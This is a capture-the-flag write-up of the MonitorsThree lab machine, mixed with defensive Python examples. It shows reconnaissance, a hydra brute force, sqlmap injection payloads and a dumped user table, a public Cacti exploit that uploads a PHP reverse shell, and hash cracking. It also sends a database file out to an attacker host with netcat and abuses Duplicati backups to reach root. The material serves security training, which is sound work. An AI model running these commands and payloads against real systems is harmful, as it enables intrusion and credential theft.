Recon
nmap -A -p- 10.129.186.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-25 12:37 UTC
Nmap scan report for 10.129.186.132
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 86:f8:7d:6f:42:91:bb:89:72:91:af:72:f3:01:ff:5b (ECDSA)
|_ 256 50:f9:ed:8e:73:64:9e:aa:f6:08:95:14:f0:a6:0d:57 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://monitorsthree.htb/
8084/tcp filtered websnp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://monitorsthree.htb --append-domain -t 150
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://monitorsthree.htb
[+] Method: GET
[+] Threads: 150
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: cacti.monitorsthree.htb Status: 302 [Size: 0] [--> /cacti]
Main page:
The monitorsthree login page:
We can try resetting passwords, and the response reveals which usernames exist on the server.
Admin is there:
and test is not there:
The subdomain gets us Cacti version 1.2.26.
Time to start looking for some CVEs for this Cacti version.
https://thehackernews.com/2024/05/critical-flaws-in-cacti-framework-could.html
Looking at Exploit-DB, NIST and Metasploit, everything seems to be either out of date or to require valid logins.
Let’s try to brute force the password then, as we know the login.
hydra -l admin -P /usr/share/wordlists/rockyou.txt monitorsthree.htb http-post-form "/login.php:username=admin&password=^PASS^:F=302" -v -f -I
While waiting for it to finish, I also run sqlmap:
sqlmap -r request.txt --batch --level=5 --risk=3
Also running sqlmap against the password reset page:
sqlmap -r request.txt -p username --dump-all --dbms=MySQL --level=5 --risk=3
...
sqlmap -r request.txt -p username --dump --dbms=MySQL --level=5 --risk=3
[*] starting @ 20:38:22 /2024-08-28/
[20:38:22] [INFO] parsing HTTP request from 'request.txt'
[20:38:22] [WARNING] provided value for parameter 'username' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[20:38:22] [INFO] testing connection to the target URL
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] n
...
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 691 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=' OR NOT 8192=8192-- CVrj
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=' OR (SELECT 9009 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(9009=9009,1))),0x716a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CRdp
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: username=';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=' AND (SELECT 7447 FROM (SELECT(SLEEP(5)))ECXW)-- QaOT
---
...
Database: monitorsthree_db
Table: users
[4 entries]
+----+------------+-----------------------------+-------------------+-----------+----------------------------------+-----------+-----------------------+------------+
| id | dob | email | name | salary | password | username | position | start_date |
+----+------------+-----------------------------+-------------------+-----------+----------------------------------+-----------+-----------------------+------------+
| 2 | 1978-04-25 | admin@monitorsthree.htb | Marcus Higgins | 320800.00 | 31a181c8372e3afc59dab863430610e8 | admin | Super User | 2021-01-12 |
| 5 | 1985-02-15 | mwatson@monitorsthree.htb | Michael Watson | 75000.00 | c585d01f2eb3e6e1073e92023088a3dd | mwatson | Website Administrator | 2021-05-10 |
| 6 | 1990-07-30 | janderson@monitorsthree.htb | Jennifer Anderson | 68000.00 | 1e68b6eb86b45f6d92f8f292428f77ac | janderson | Network Engineer | 2021-06-20 |
| 7 | 1982-11-23 | dthompson@monitorsthree.htb | David Thompson | 83000.00 | 633b683cc128fe244b00f176c8a950f5 | dthompson | Database Manager | 2022-09-15 |
+----+------------+-----------------------------+-------------------+-----------+----------------------------------+-----------+-----------------------+------------+
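The two weaknesses sqlmap and the reset page exposed above (a username lookup built by string concatenation, and a reset response that differs for existing and non-existing accounts) are easiest to see side by side. The following is an added example, not code from the box or from the author: a hypothetical forgot-password handler in both its vulnerable and hardened form, run against an in-memory SQLite stand-in for the users table with constructed sample rows. The `leaks_user_existence` oracle is the kind of unit test a team can keep around so the uniform-response property does not regress.

```python
import sqlite3

# Constructed stand-in for the users table (sample rows, not the real dump).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("admin", "admin@example.invalid"), ("mwatson", "mwatson@example.invalid")],
    )
    return conn


GENERIC = "If that account exists, a reset link has been sent."


def forgot_password_vulnerable(conn, username):
    """Hypothetical handler with both weaknesses: the query is assembled from
    the raw username, and the reply says whether the account was found."""
    query = "SELECT email FROM users WHERE username = '" + username + "'"
    row = conn.execute(query).fetchone()
    if row:
        return f"Reset link sent to {row[0]}"
    return "No such user"


def forgot_password_hardened(conn, username):
    """Parameterised lookup and a uniform reply. The side effect (sending the
    mail) still depends on the row, but nothing about it reaches the caller."""
    row = conn.execute(
        "SELECT email FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row:
        pass  # send_reset_mail(row[0]) would go here (hypothetical)
    return GENERIC


def leaks_user_existence(handler, conn):
    """Unit-test style oracle check: does the handler answer differently for
    a known account and a made-up one? True means enumeration is possible."""
    return handler(conn, "admin") != handler(conn, "no-such-user-zz")


if __name__ == "__main__":
    db = make_db()
    # The boolean-based probe sqlmap reported, with the random tail replaced.
    for payload in ("' OR NOT 8192=8192-- x", "' OR NOT 8192=8193-- x"):
        print(repr(payload), "->", forgot_password_vulnerable(db, payload),
              "|", forgot_password_hardened(db, payload))
    print("vulnerable leaks:", leaks_user_existence(forgot_password_vulnerable, db))
    print("hardened leaks:", leaks_user_existence(forgot_password_hardened, db))
```

With the vulnerable handler the two boolean probes give different answers (the true branch returns the first row's email, the false branch returns "No such user"), which is exactly the oracle sqlmap needs; the hardened handler returns the same string for every input, so neither injection nor username enumeration has anything to observe.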
Using CrackStation we get: 31a181c8372e3afc59dab863430610e8 md5 greencacti2001
We are in.
Trying these creds on Cacti as well, we are in once again.
We can now get a shell with CVE-2024-25641. Googling gets us:
https://github.com/5ma1l/CVE-2024-25641
┌─[✗]─[user@parrot]─[~/Desktop/CVE-2024-25641]
└──╼ $./exploit.py http://cacti.monitorsthree.htb/cacti/ admin greencacti2001 -p ~/4victim/php-reverse-shell.php
Created by: 5ma1l
Automate the process of exploiting the CVE-2024-25641
[*] Login attempts...
[SUCCESS]
[*] Creating the gzip...
[SUCCESS]
GZIP path is /home/user/Desktop/CVE-2024-25641/rvbwcsivuoeqgipz.php.gz
[*] Sending payload...
[SUCCESS]
You will find the payload in http://cacti.monitorsthree.htb/cacti//resource/rvbwcsivuoeqgipz.php
Do you wanna start the payload ?[Y/n]Y
Payload is running...
We are in. Standard shell stabilisation:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z
stty raw -echo; fg
User
Looking for config files in /www/html, our usual culprit:
find . -name '*config*'
Gets us:
#$rdatabase_type = 'mysql';
#$rdatabase_default = 'cacti';
#$rdatabase_hostname = 'localhost';
#$rdatabase_username = 'cactiuser';
#$rdatabase_password = 'cactiuser';
#$rdatabase_port = '3306';
#$rdatabase_retries = 5;
#$rdatabase_ssl = false;
Let's explore the database:
mysql -u cactiuser -p -h localhost -P 3306 cacti
select * from user_auth;
1 | admin | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G | 0 | Administrator | marcus@monitorsthree.htb |
3 | guest | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu | 0 | Guest Account | guest@monitorsthree.htb |
4 | marcus | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK | 0 | Marcus | marcus@monitorsthree.htb |
Let's get cracking with john:
$john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
12345678910 (?)
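Both credential recoveries on this box come down to how passwords were stored and chosen: the web app kept unsalted MD5 (one lookup on CrackStation), and Cacti's bcrypt did not help marcus because "12345678910" is in rockyou. As an added example (not the box's or either project's code), here is the storage and policy side a defender would want: a salted, memory-hard hash via `hashlib.scrypt`, constant-time verification, and a registration check against a constructed list of common passwords (a real deployment would use a large breach corpus). The `legacy_md5` function is only there to show why identical passwords with no salt are trivially matched.

```python
import hashlib
import hmac
import os

# Constructed mini list of common passwords; real deployments use a breach corpus.
COMMON_PASSWORDS = {"12345678910", "password", "123456", "greencacti2001"}

# scrypt parameters (assumed reasonable defaults for a web app; tune per host).
SCRYPT_N, SCRYPT_R, SCRYPT_P, DKLEN = 2 ** 14, 8, 1, 32


def legacy_md5(password: str) -> str:
    """Unsalted and fast: the same password always yields the same digest,
    so a precomputed table answers it instantly. Shown only as the anti-pattern."""
    return hashlib.md5(password.encode()).hexdigest()


def store_password(password: str) -> str:
    """Return a self-describing record 'scrypt$<salt hex>$<digest hex>'."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    return "scrypt$" + salt.hex() + "$" + digest.hex()


def verify_password(stored: str, candidate: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    try:
        algo, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "scrypt":
        return False
    digest = hashlib.scrypt(candidate.encode(), salt=bytes.fromhex(salt_hex),
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def password_allowed(password: str, min_len: int = 12) -> bool:
    """Registration-time policy: length plus a blocklist of known-bad values.
    A slow hash cannot protect a password that sits in every wordlist."""
    return len(password) >= min_len and password.lower() not in COMMON_PASSWORDS


if __name__ == "__main__":
    print("md5 is deterministic:", legacy_md5("greencacti2001") == legacy_md5("greencacti2001"))
    rec1, rec2 = store_password("correct horse battery staple"), store_password("correct horse battery staple")
    print("scrypt records differ (random salt):", rec1 != rec2)
    print("verify ok:", verify_password(rec1, "correct horse battery staple"))
    print("verify wrong:", verify_password(rec1, "12345678910"))
    print("policy rejects 12345678910:", not password_allowed("12345678910"))
```

The record format stores the salt beside the digest because a salt is not a secret; its job is to make every hash unique so a single precomputed table cannot be reused, which is the property the MD5 column in the dump lacked.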
su marcus
gets us the flag.
Priv esc
Checking all of the ports with ss -tuln gives:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8200 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:33029 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8084 0.0.0.0:* LISTEN
tcp6 0 0 :::80 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
udp 0 0 127.0.0.53:53 0.0.0.0:*
udp 0 0 0.0.0.0:68 0.0.0.0:*
Let's check what is on port 8200 by forwarding it with socat:
socat TCP-LISTEN:8080,fork TCP:localhost:8200
Checking if there is anything on the server about “Duplicati”: /opt/duplicati/config has a bunch of interesting files including Duplicati-server.sqlite. Let's send it back to us using netcat:
# on victim
nc 10.10.14.134 2222 < Duplicati-server.sqlite
# on host
nc -l -p 2222 > received_file
In the Option table we can find the server passphrase and its salt.
pass: Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
salt: xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=
Checking the login screen with Burp gets us the same salt.
To get it decrypted, we first need to learn what it is.
https://hashes.com/en/tools/hash_identifier
We can reverse this process using CyberChef:
pass: 59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a
salt: c537f29165757404e9159bcf84294424b273600e40e0bef8857ec52bc5e66342
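The "learn what it is first" step above (hash identifier, then CyberChef for the base64-to-hex conversion) can be done offline in a few lines. This is an added example, not part of the original writeup: it detects whether a value is hex or base64, decodes it, and reports the raw length together with the digest algorithms that produce an output of that size. The two values are the ones from the Option table above; the length table is a constructed helper and only lists common unkeyed hashes, so a 32-byte result means "consistent with SHA-256", not proof of it.

```python
import base64
import binascii
import re

# The two values from the Duplicati Option table shown above.
SERVER_PASSPHRASE_B64 = "Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho="
SERVER_SALT_B64 = "xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I="

# Raw output sizes (bytes) of common unkeyed hashes; constructed lookup, not exhaustive.
DIGEST_LENGTHS = {
    16: ["MD5"],
    20: ["SHA-1", "RIPEMD-160"],
    28: ["SHA-224"],
    32: ["SHA-256", "BLAKE2s-256"],
    48: ["SHA-384"],
    64: ["SHA-512", "BLAKE2b-512"],
}

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_value(value: str):
    """Return (encoding, raw_bytes). Hex is tried first because an even-length
    hex string can also be syntactically valid base64."""
    v = value.strip()
    if HEX_RE.match(v) and len(v) % 2 == 0:
        return "hex", bytes.fromhex(v)
    if B64_RE.match(v) and len(v) % 4 == 0:
        try:
            return "base64", base64.b64decode(v, validate=True)
        except binascii.Error:
            pass
    raise ValueError(f"not hex or base64: {value!r}")


def classify(value: str) -> dict:
    """Decode and summarise: hex form, byte length, and which digests match it."""
    encoding, raw = decode_value(value)
    return {
        "encoding": encoding,
        "hex": raw.hex(),
        "length": len(raw),
        "candidates": DIGEST_LENGTHS.get(len(raw), ["no common digest of this size"]),
    }


if __name__ == "__main__":
    for label, v in (("pass", SERVER_PASSPHRASE_B64), ("salt", SERVER_SALT_B64)):
        info = classify(v)
        print(f"{label}: {info['encoding']} -> {info['length']} bytes, "
              f"hex {info['hex']}, candidates {info['candidates']}")
```

Both values decode to 32 bytes, which is why the hash identifier points at SHA-256 for the passphrase; the salt being 32 random bytes is fine in itself, but note that the same salt is handed to the browser on the login screen, so nothing about it is secret.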
Couldn't crack it with john in a reasonable amount of time, so I decided to learn more about Duplicati.
CyberChef conversion of the passphrase:
URL-encode it with Ctrl+U in Burp and send.
We are in.
I was stumbling here for a while, trying to create a backup with the root folder. Only later did I discover that the main folder shown for backups is the Docker system, and our system is under the source folder.
So I tried creating the backup there:
We can now copy it to our machine, unzip it and get the flag.
Looking at the root folder we can also find the password for Duplicati: MonitorsThreeDuplicatiBackupPassword2024
Now time to get real root.
Let's back up our SSH keys first:
Then restore them to root:
We can now connect via ssh to root.